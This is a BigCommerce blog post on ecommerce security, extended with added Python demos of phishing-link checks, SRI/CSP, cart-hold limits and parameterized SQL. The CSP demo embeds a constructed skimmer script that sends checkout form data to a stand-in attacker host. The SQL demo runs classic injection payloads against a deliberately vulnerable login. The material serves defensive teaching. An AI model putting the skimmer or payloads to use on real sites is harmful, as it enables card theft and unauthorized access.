
Ecommerce Security: Protecting Your Store from Cybervillains

By Leigh-Anne Truitt on August 3, 2020


Leigh-Anne Truitt

Leigh-Anne Truitt is a part of the SEO team at BigCommerce where she researches and discovers strategies to increase organic traffic. Prior to joining the ecommerce industry, Leigh-Anne perfected her marketing skills at The University of Texas at Austin and CanIRank.

Ecommerce is pretty great, isn't it? Thousands of small and medium-sized companies looking to expand beyond their current markets adopt online solutions every year.

Goodbye obscurity; hello acclaim. All of a sudden, they're sending pickled Okra from Louisiana to catering companies in Barcelona. Bingo: it's a whole new world.

Unfortunately, cybercriminals can smell success from 3,000 bytes away. They slither along like snakes and slide into databases via unattended back doors and glitchy plug-ins. Then they swallow consumer information and slink away into the deep web.

In 2019, 62% of all retail cyberattacks took place in the world of ecommerce. Point of sale (POS) and web application attacks stole credit card data and consumer addresses, while distributed denial-of-service (DDoS) attacks forced companies offline — sometimes for days. Scary stuff.


So, what can you do to protect your company and your customers? Quite a bit, actually. In this blog post, we'll examine key ways you can keep your business and all of its associated data safe and sound.

Security Threats to Ecommerce

Hackers are enthusiastic beings. They spend their days looking for vulnerabilities and loopholes in ecommerce sites, which they eagerly exploit after discovery. A bored hacker with a big cup of coffee can do more damage in a single afternoon than a monkey in your mainframe. Here are some of their hobbies:

1. Phishing

Phishing scams use fake emails, phone calls (vishing), and text messages (smishing) to steal passwords, banking information, and other sensitive data from unsuspecting consumers. To create convincing emails, attackers copy real messages from widely used businesses (PayPal, Amazon, banks, and retail stores), down to the logos and footer links. Many of the links in a phishing email point at legitimate pages on the real site, with one exception: the link that matters, which leads to the attacker's page.

That malicious link leads to a landing page that looks genuine enough to pass muster. The page contains an authentic-looking login or payment form that captures whatever the victim types and forwards it to the attacker, who now holds the consumer's email address and password. Because so many people reuse passwords, the same pair is then tried against other shops and banks (credential stuffing).

Phishing emails used to be easy to spot. Now, not so much. They're very easy to create and lots of people fall for them, making them one of the most common ecommerce security risks. Recent phishing scams include campaigns targeting HSBC customers and Microsoft Office 365 users working from home.
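As an added example (not code from the original post), here is a small Python check that applies the rule described above and looks for the odd link out in an email: anchors whose target lies outside the sender's domain, or whose visible text shows one domain while the href goes somewhere else. The email body and the bank's domain are constructed for the demonstration, and the "last two labels" reduction to a brand domain is a simplification that a production check would replace with a public-suffix list.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a phishing email imitating a bank whose real domain is
# example-bank.com (hypothetical). Two links go to the real site; the one that
# matters goes to a lookalike host that merely starts with the bank's name.
SAMPLE_EMAIL = """
<p>Dear customer, unusual activity was detected on your account.</p>
<p>Please <a href="https://example-bank.com.verify-login.net/secure">https://www.example-bank.com/login</a>
to confirm your identity within 24 hours.</p>
<p><a href="https://www.example-bank.com/help">Help centre</a> |
<a href="https://www.example-bank.com/privacy">Privacy policy</a></p>
"""

LOOKS_LIKE_URL = re.compile(r"(https?://)?[\w.-]+\.[a-z]{2,}(/\S*)?")


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) pairs for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def brand_domain(host: str) -> str:
    """Reduce a host to its last two labels (assumption: no public-suffix handling,
    so this is wrong for domains like example.co.uk; good enough for the demo)."""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def suspicious_links(html: str, sender_domain: str) -> list:
    """Return [(href, visible_text, reasons)] for links that deserve a closer look."""
    parser = LinkExtractor()
    parser.feed(html)
    flagged = []
    for href, text in parser.links:
        target = host_of(href)
        reasons = []
        if brand_domain(target) != brand_domain(sender_domain):
            reasons.append("target outside sender's domain")
        shown = text.lower()
        if LOOKS_LIKE_URL.fullmatch(shown):
            shown_host = host_of(shown if "://" in shown else "http://" + shown)
            if brand_domain(shown_host) != brand_domain(target):
                reasons.append("visible text names a different host than href")
        if reasons:
            flagged.append((href, text, reasons))
    return flagged


if __name__ == "__main__":
    for href, text, reasons in suspicious_links(SAMPLE_EMAIL, "example-bank.com"):
        print(f"{text!r} -> {href}: {', '.join(reasons)}")
```

Run against the sample, only the "login" link is flagged, for both reasons; the help and privacy links pass because they really do go to the bank's domain. The same check is what a mail gateway's link-rewriting or a user's hover-over-the-link habit does by hand.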

2. DDoS attacks

In human terms, a distributed denial-of-service (DDoS) attack is the equivalent of a parent temporarily overwhelmed by the simultaneous demands of eight children. In computing terms, DDoS attacks knock servers over by flooding them with junk requests, more than the server (or the network link in front of it) can handle. The requests come from thousands, sometimes hundreds of thousands, of compromised machines at once.

Of course, attackers don't own thousands of computers. Instead, they assemble a network of compromised hosts, known as a botnet, to do the dirty work. Some hosts are recruited by sending malicious links to thousands of people via email and direct message: when a user clicks, they land on a page that exploits a browser or plug-in vulnerability and silently installs malware (a drive-by download). Others are poorly secured internet-connected devices, such as routers and cameras still using factory default passwords, which bots scan for and take over without any user involvement at all. Either way, the owners usually have no idea.

On the day of the attack, the operator sends a command to the bots, which all begin hammering the target with requests. DDoS attacks are hard to stop at the origin because the malicious traffic arrives from so many different places and typically exceeds what a single site's connection can absorb; in practice they are mitigated upstream, by a content delivery network or scrubbing service that filters traffic before it reaches your servers. In early 2020, Amazon reported that its AWS Shield service had absorbed a 2.3 Tbps attack, one of the largest ever recorded, aimed at a customer hosted on its infrastructure.

3. Malicious threats

Malicious threats go beyond botnet software. Attackers regularly infect computers with malware to steal corporate or consumer information, and sometimes deploy viruses or worms that damage systems from the inside out. They usually get past network defenses either by exploiting known, unpatched vulnerabilities or by targeting specific users with malicious links and attachments sent via email.

Malware families include trojan horses, spyware, and ransomware. A trojan horse arrives in disguise, as a seemingly legitimate installer, document, or browser extension; the user runs it voluntarily and installs the malware along with whatever it pretended to be. Attackers use trojans to build botnets, steal saved credentials and emails, and control computers remotely.

Spyware is genuinely sinister. Once installed on an unsuspecting user's computer, it records what they do and forwards confidential information back to the attacker. Keyloggers (which capture every keystroke, passwords included) and system monitors (which record screens, sessions and application use) are the main types. Rootkits are not spyware as such, but are often bundled with it to hide its presence from the operating system and antivirus tools. Tracking cookies and web beacons are a milder cousin: they follow browsing across sites rather than stealing data from the machine.

Ransomware attacks are a form of extortion. Most ransomware arrives the way a trojan does, through trickery, but there are exceptions: WannaCry, attributed to North Korea, spread on its own in May 2017 as a cryptoworm by exploiting an unpatched Windows SMB vulnerability (MS17-010, the EternalBlue exploit). Ransomware encrypts the victim's files (older variants simply locked the screen) and demands payment for the key; many modern crews also copy the data first and threaten to publish it if the victim does not pay, so good backups alone no longer end the extortion.

4. Credit card fraud

Cybercriminals don't need access to your company's admin panel or backend to commit credit card fraud. For an online (card-not-present) purchase, all they need is a stolen card number, its expiry date, the cardholder name, and usually the three- or four-digit security code. In 2018, 38.6% of the world's credit fraud cases happened in America, making it the riskiest place for credit card fraud in the world.

Crooks use several strategies to obtain card details. The most obvious, and by far the simplest for a novice criminal, is phishing. Next is formjacking (the Magecart attacks), where the attacker plants a small piece of malicious JavaScript in a store's checkout page, either by compromising the site itself or by tampering with a third-party script the page loads (a chat widget, analytics tag or advertising script). The script copies the card fields as the customer types or when they click submit and sends a copy to the attacker's server, while the real order goes through normally, so neither the shopper nor the merchant notices anything wrong.

Other harvesting tactics include skimming, where thieves attach a skimmer device to a card reader at a restaurant, gas pump or ATM. One swipe copies everything encoded on the card's magnetic stripe, and a hidden camera or fake keypad overlay captures the PIN. Compromised point-of-sale systems are another major source of card numbers.

In recent years, even major companies have been hit at both ends of the pipeline, the theft and the cash-out. British Airways, Ticketmaster, and Newegg all suffered formjacking attacks in 2018. In 2016, a coordinated group of roughly 100 people used 1,600 fake cards cloned from stolen South African card data to withdraw nearly $13 million from 1,400 Seven Bank ATMs in Japan.
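As an added example, not code from the original post or from any of the companies named above, here is a Python sketch of the two browser-side controls that blunt formjacking via a third-party script: Subresource Integrity (SRI), where the checkout page pins the hash of each script it loads so a tampered copy is refused, and a Content Security Policy (CSP) whose connect-src and form-action directives stop the page from sending data to hosts you never approved. The scripts, hostnames and policy below are constructed; the CSP matcher handles only origin and 'self' sources, not wildcards with paths, nonces or hashes.

```python
import base64
import hashlib
from urllib.parse import urlparse

# Constructed: the legitimate checkout script, and the same script after a
# Magecart-style edit that posts the payment form to an attacker-run host
# (stats-cdn.example.net is hypothetical).
GOOD_SCRIPT = "document.getElementById('pay').addEventListener('submit', validateCard);"
SKIMMED_SCRIPT = GOOD_SCRIPT + (
    "document.getElementById('pay').addEventListener('submit',e=>fetch("
    "'https://stats-cdn.example.net/c',{method:'POST',"
    "body:new FormData(e.target)}));"
)

# Constructed policy for a shop at https://shop.example.com that uses a hosted
# payment gateway at pay.example-gateway.com (hypothetical).
CSP = (
    "default-src 'self'; "
    "script-src 'self' https://pay.example-gateway.com; "
    "connect-src 'self' https://pay.example-gateway.com; "
    "form-action 'self' https://pay.example-gateway.com"
)


def sri_integrity(script_text: str, algo: str = "sha384") -> str:
    """Value for <script integrity="...">: '<algo>-<base64 digest>' of the exact bytes."""
    digest = hashlib.new(algo, script_text.encode("utf-8")).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(script_text: str, integrity: str) -> bool:
    """What the browser does before executing a script that carries an integrity attribute."""
    algo, _, expected = integrity.partition("-")
    actual = base64.b64encode(hashlib.new(algo, script_text.encode("utf-8")).digest())
    return actual.decode("ascii") == expected


def parse_csp(csp: str) -> dict:
    """'directive source source; ...' -> {directive: [sources]}"""
    policy = {}
    for part in csp.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0]] = tokens[1:]
    return policy


def csp_allows(csp: str, directive: str, url: str, page_origin: str) -> bool:
    """Would a request governed by `directive` to `url` be permitted?
    Fetch directives fall back to default-src when absent, as in browsers;
    form-action has no fallback and defaults to allowing everything."""
    policy = parse_csp(csp)
    if directive in policy:
        sources = policy[directive]
    elif directive != "form-action":
        sources = policy.get("default-src", ["*"])
    else:
        sources = ["*"]
    target = urlparse(url)
    origin = f"{target.scheme}://{target.netloc}".lower()
    for src in sources:
        if src == "'none'":
            return False
        if src == "*" or src.lower() == origin or (src == "'self'" and origin == page_origin.lower()):
            return True
    return False
```

With the policy above, the skimmer's fetch to stats-cdn.example.net is refused by connect-src, and a rewritten form that tries to submit there is refused by form-action, while the real gateway still works. Two caveats: SRI can only pin scripts whose content does not change, so self-updating third-party tags cannot use it; and both controls live in the page your server sends, so an attacker who can write to your server can simply remove them. They complement file integrity monitoring and patching rather than replace them.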

5. SQL injections

Sneaky and disruptive, SQL injection is one of the most worrying threats for ecommerce companies. The site builds a database query by pasting untrusted input (a search term, a login field, a URL parameter) straight into SQL text, so an attacker who types carefully crafted input can change what the query does. With that foothold, attackers read or alter data, bypass logins, dump customer and card records, delete tables, and on some database setups run commands on the server itself.

SQL injection is easy to prevent (more on that below), yet it remains one of the most common web application flaws, because plenty of hand-written code still builds queries from strings. Smaller companies running custom code on their own servers are frequent targets, but big fish aren't immune either. In October 2015, British telecommunications firm TalkTalk fell victim to an SQL injection attack in which the attackers accessed personal data of roughly 157,000 customers, including bank account details for more than 15,000 of them.

6. Blocking carts

Most ecommerce stores use dynamic inventory management. When a shopper adds a product to their cart, the displayed available stock goes down; if they later remove it, the stock goes back up. Inventory management systems help companies monitor retail trends and keep popular items in stock. Unfortunately, a store that treats an item sitting in a cart as reserved stock is vulnerable to cart blocking attacks.

Criminals use cart blocking (also called inventory hoarding or denial of inventory) to stop consumers from shopping on a specific site. Remember DDoS attacks? Cart blocking uses the same idea on a smaller scale: a script, or a botnet of many sessions, adds thousands of units of the most popular products to shopping carts and never checks out. Consequently, many items on that site suddenly show as out of stock.

Cart blocking attacks are meant to cause consumer frustration. Potential customers can't place orders and go elsewhere, so the target site loses revenue and possibly a chunk of its customer base. The usual defenses are to hold stock for a cart only for a limited time, cap how much a single session can hold, and rate-limit add-to-cart requests from one client or IP range.
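Here is an added Python model (constructed for this post, not any real platform's inventory code) of the reservation-with-expiry approach: a cart hold counts against availability only until it expires, and one client can hold only a few units, so a flood of add-to-cart requests hides stock for minutes rather than for good. The product, quantities, timings and the clock injection are made up for the demonstration.

```python
import time


class Inventory:
    """Stock with time-limited, per-client cart holds (constructed API).

    Adding to a cart reserves units only until `hold_seconds` elapses without a
    checkout; expired holds go back on sale automatically, so a bot that fills
    carts and never pays can only hide stock briefly. A per-client cap bounds
    how much any one session can tie up at all.
    """

    def __init__(self, stock, hold_seconds=600, max_per_client=5, clock=time.time):
        self.stock = dict(stock)        # sku -> units physically on hand
        self.holds = []                 # [sku, client, qty, expires_at]
        self.hold_seconds = hold_seconds
        self.max_per_client = max_per_client
        self.clock = clock              # injectable so the demo is deterministic

    def _expire_holds(self):
        now = self.clock()
        self.holds = [h for h in self.holds if h[3] > now]

    def _held(self, sku, client=None):
        return sum(h[2] for h in self.holds
                   if h[0] == sku and (client is None or h[1] == client))

    def available(self, sku):
        """Units shoppers can still add: on hand minus unexpired holds."""
        self._expire_holds()
        return self.stock[sku] - self._held(sku)

    def add_to_cart(self, sku, client, qty):
        self._expire_holds()
        if qty <= 0 or self._held(sku, client) + qty > self.max_per_client:
            return False                # per-client cap
        if qty > self.available(sku):
            return False                # genuinely out of stock right now
        self.holds.append([sku, client, qty, self.clock() + self.hold_seconds])
        return True

    def checkout(self, sku, client):
        """Convert this client's holds into a sale; returns units sold."""
        self._expire_holds()
        qty = self._held(sku, client)
        self.holds = [h for h in self.holds if not (h[0] == sku and h[1] == client)]
        self.stock[sku] -= qty
        return qty


def simulate_cart_blocking():
    """Constructed scenario: 50 bot sessions hold all 100 units of one product,
    a real shopper is blocked, then the holds lapse and the shopper buys."""
    now = [0.0]
    inv = Inventory({"okra-jar": 100}, hold_seconds=600, max_per_client=5,
                    clock=lambda: now[0])
    bot_capped = not inv.add_to_cart("okra-jar", "bot-0", 6)      # cap blocks a big grab
    bots_ok = all(inv.add_to_cart("okra-jar", f"bot-{i}", 2) for i in range(50))
    during = inv.available("okra-jar")                             # 0: stock looks gone
    shopper_blocked = not inv.add_to_cart("okra-jar", "shopper", 1)
    now[0] += 601                                                  # holds expire unpaid
    after = inv.available("okra-jar")                              # back to 100
    shopper_ok = inv.add_to_cart("okra-jar", "shopper", 1)
    sold = inv.checkout("okra-jar", "shopper")
    return {"bot_capped": bot_capped, "bots_ok": bots_ok, "during": during,
            "shopper_blocked": shopper_blocked, "after": after,
            "shopper_ok": shopper_ok, "sold": sold, "stock_left": inv.stock["okra-jar"]}


if __name__ == "__main__":
    print(simulate_cart_blocking())
```

The hold window is the trade-off knob: ten minutes is long enough for a real checkout, short enough that an attacker must keep re-adding, which is exactly the repetitive traffic a rate limiter or bot-detection layer can then spot. Identifying a "client" by session cookie alone is weak, since a bot can mint sessions freely; in practice the cap is also applied per IP range and per device fingerprint.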

Why Should Ecommerce Security be a Priority?

In a nutshell, you need to make ecommerce security a priority because if you don't, you could lose everything you've worked toward. According to the latest statistics, one in five small businesses fall victim to credit card fraud each year — and that's just one type of ecommerce threat.

Small- and medium-sized companies have an edge over huge corporations because they offer truly personalized service, but they lose that advantage if they compromise security. Large corporations usually survive data breaches; mom-and-pop retailers, not so much.


In a 2017 personal information security survey, only 25% of adults in America considered ecommerce sites to be extremely or very trustworthy when it came to data protection. Companies who invest in ecommerce security make their sites safer and improve consumer trust; in turn, they increase their conversion rates and gain repeat customers.

Ways to Secure Your Ecommerce Store

Ecommerce security threats are real and concerning. Data breaches aren't inevitable, though. There are lots of ways you can protect customer information and keep hackers at bay. Let's have a look at seven security strategies you can implement right away.

1. Choose the right ecommerce platform

Great ecommerce platforms prioritize security. They're easy to use, offer robust tools to measure your store's success, and employ dedicated security teams to find and fix vulnerabilities. Truly excellent platforms, like Larq's host, track the latest threats and ship patches as soon as they find security issues.

As you shop for an ecommerce host, take note of each platform's security credentials. In particular, look for a platform validated as a PCI DSS Level 1 service provider, the most stringent level, which requires an annual on-site assessment by a Qualified Security Assessor rather than a self-assessment questionnaire. Whatever the level, PCI DSS requires the provider to:

  • Build and maintain a secure network and systems.
  • Protect cardholder data.
  • Maintain a vulnerability management program.
  • Implement strong access control measures.
  • Regularly monitor and test networks.
  • Maintain an information security policy.

One caveat: the platform's compliance covers the platform. If your own theme, plug-ins or integrations ever see card data, you are responsible for that part, so ask your provider which self-assessment questionnaire (SAQ) still applies to you.

Industry-leading platforms maintain multi-level security systems, have the network capacity and upstream filtering to absorb DDoS attacks, and achieve high availability at all times.

2. Use multi-layer security

Multiple layers of security are vital in ecommerce, and perimeter and server-specific firewalls are a good start. A network firewall limits which ports and services are reachable from the internet at all, which shuts out the bulk of automated scanning. A web application firewall (WAF) sits in front of the site and inspects HTTP requests for known attack patterns, such as SQL injection and cross-site scripting payloads, before they reach your code. Both let you monitor incoming and outgoing traffic and spot anomalies.

Automatic file integrity monitoring (FIM) is another critical control. Attacks, including malware installations and formjacking, usually begin with unexpected file modifications. In plain terms, a FIM solution keeps a cryptographic hash of every file on your server, periodically recomputes them, and alerts you when a file changes, appears or disappears compared to the known-good baseline. The baseline itself must be stored where an intruder on the web server cannot rewrite it.

Online retailers, like Camelbak, use intrusion detection systems (IDS), which monitor networks and hosts and report malicious activity and policy violations to administrators. A network intrusion detection system (NIDS) analyzes traffic on the wire; a host-based intrusion detection system (HIDS) watches what happens on the server itself (logs, processes, privileged commands, file changes). Used together, each covers what the other misses. Intrusion prevention systems (IPS) go one step further and respond to detected threats automatically, for example by dropping the offending connection.

3. Switch to HTTPS

Hypertext Transfer Protocol Secure (HTTPS) used to be reserved for payment pages, while the rest of a site ran over plain Hypertext Transfer Protocol (HTTP). HTTPS encrypts and authenticates the connection, so nobody between the shopper and your server, on a coffee shop Wi-Fi or at a hostile network provider, can read or modify what passes through it, session cookies and card numbers included. Nowadays most ecommerce platforms serve every page over HTTPS. Browsers show a lock icon for HTTPS pages and, more importantly, label plain-HTTP pages "Not secure", which shoppers notice.


HTTPS is a sensible security decision, and it also factors into your site's search engine ranking. Google started using HTTPS as a ranking signal in 2014, and other search engines followed.

To move your site to HTTPS, first obtain a TLS certificate (still widely called an SSL certificate) from a certificate authority or your hosting company; many hosts provision one automatically and free of charge. Then configure the server to redirect every HTTP request to its HTTPS equivalent with a permanent (301) redirect, so that old links and search results keep working, and update internal links and the links in transactional emails to point at the https:// addresses directly. Once everything works, add a Strict-Transport-Security header so that browsers refuse to fall back to HTTP.

4. Back up your data regularly

Attackers are relentless, and despite everything, they sometimes succeed in breaking into databases. If your site is compromised or pushed offline by a targeted attack, find and close the hole first, then restore your data from a clean recovery point; restoring before fixing the cause just hands the attacker the site back.

Most web hosts keep several versions of your site on their servers, but secondary backups are a sensible option anyway. There are two catches. First, the backup must be current: six-month-old files are useless in an emergency. Second, it must be somewhere the attacker can't reach, off the web server and ideally offline or write-protected, because ransomware deliberately seeks out any backups it can find. Because most merchants are too busy to remember manual backups, most opt for automatic backup services; whichever you use, practice a restore occasionally so you know it works.

5. Do not hold on to customer credit card data

Hackers love stealing credit card numbers. If you store consumer card data and cybercriminals find out, you become a target for malicious activity. Be like Burrow: don't do it. Disable offline credit card processing, never process cards manually, and never let the full card number touch your own servers at all; with a hosted payment page or tokenized card fields, the shopper's card goes straight to the payment processor and you keep only a token you can charge later.


To avoid credit card fraud and remove the temptation, use a payment gateway provider with Payment Card Industry Data Security Standard (PCI DSS) validation. If card data is handled by your PCI DSS Level 1 platform and gateway rather than by your own systems, your own compliance obligations shrink to the simplest self-assessment questionnaire, and gateway providers will readily onboard such sites.

6. Keep an eye out for malicious activity

First things first: look out for phishing attempts, and delete or report suspicious links and odd messages. Never follow "validate your password" hyperlinks, and never give out passwords or one-time codes over the phone, no matter who the caller claims to be.

Let's briefly revisit SQL injection. These attacks remain extremely common, but they're also very easy to prevent. Every modern database driver supports parameterized statements (also called prepared statements, bind variables or placeholders): the query text contains a placeholder for each value, and the values travel separately, so the database always treats them as data and never as SQL, however many quotes or keywords they contain.

Parameterized queries are an excellent defense against SQL injection, but they don't make a database impenetrable. Developers still need to validate input (a quantity should be a positive integer, not free text), avoid building table or column names from user input (placeholders can't parameterize those), and give the application's database account only the permissions it needs, so that even a successful injection can't read the card table or drop it.
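The attack described under "SQL injections" above and the parameterized fix described here are easiest to see side by side, so here is an added Python example (not the post's code) using the standard library's sqlite3 module and a constructed two-row customers table. The vulnerable login builds the query by string formatting; the safe one uses placeholders. The same two classic payloads are run against each.

```python
import sqlite3

# Constructed sample data standing in for a store's customer table. A real
# store should never keep card numbers or plaintext passwords; the columns are
# here only so the injection has something worth stealing.
SAMPLE_ROWS = [
    ("alice@example.com", "correct horse battery", "4111111111111111"),
    ("bob@example.com", "hunter2", "5500000000000004"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (email TEXT, password TEXT, card TEXT)")
    conn.executemany("INSERT INTO customers VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def login_vulnerable(conn, email: str, password: str) -> list:
    """The bug: user input is pasted into the SQL text, so a quote in the input
    ends the string literal and whatever follows is executed as SQL."""
    sql = ("SELECT email, card FROM customers "
           f"WHERE email = '{email}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, email: str, password: str) -> list:
    """The fix: placeholders in the SQL, values passed separately. The driver
    hands the values to the database as data; they are never re-parsed as SQL."""
    sql = "SELECT email, card FROM customers WHERE email = ? AND password = ?"
    return conn.execute(sql, (email, password)).fetchall()


def demo() -> dict:
    conn = make_db()
    bypass = "' OR '1'='1"             # makes the WHERE clause "... OR '1'='1'", true for every row
    comment = "alice@example.com'--"   # "--" comments out the rest, including the password check
    return {
        "vuln_bypass": login_vulnerable(conn, "nobody", bypass),
        "vuln_comment": login_vulnerable(conn, comment, "wrong"),
        "safe_bypass": login_parameterized(conn, "nobody", bypass),
        "safe_comment": login_parameterized(conn, comment, "wrong"),
        "safe_real": login_parameterized(conn, "bob@example.com", "hunter2"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:13s} -> {rows}")
```

Against the vulnerable function the first payload returns every customer's card and the second logs in as Alice without a password; against the parameterized one both return nothing, and only the genuine credentials match. The placeholder character differs by driver (`?` here, `%s` for psycopg2 and MySQL drivers, `$1` for asyncpg), but the rule is the same everywhere: never format values into the query string yourself, and be aware that ORM escape hatches such as raw SQL still need bound parameters.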

7. Train your staff

Your staff members are your most valuable asset. They can also be a liability, particularly if they don't recognize security threats. Trojans and worms regularly get into corporate networks through ordinary web browsing and email attachments. You can try to stop unsanctioned internet access at work with monitoring software, or you can train your staff in cybersecurity best practices.

Phishing awareness training provides an obvious starting point. When employees know how to spot social engineering and phishing emails, they recognize and report attempts to infiltrate your network instead of clicking. Other training topics include identity theft prevention, multi-factor authentication (which means a phished password alone is not enough to get into your admin panel or email), secure browsing, and public Wi-Fi safety.

Executive Summary

Back in the 5th century BC, Chinese general and strategist Sun Tzu wrote the following in his military treatise, The Art of War:

"If you know the enemy and know yourself, you need not fear the result of a hundred battles."

Hackers are the nemeses of internet security experts across the globe. You can protect your online store if you familiarize yourself with their tactics and learn about defense strategies. With the right ecommerce security measures in place, your business will flourish, and your brand will prevail.
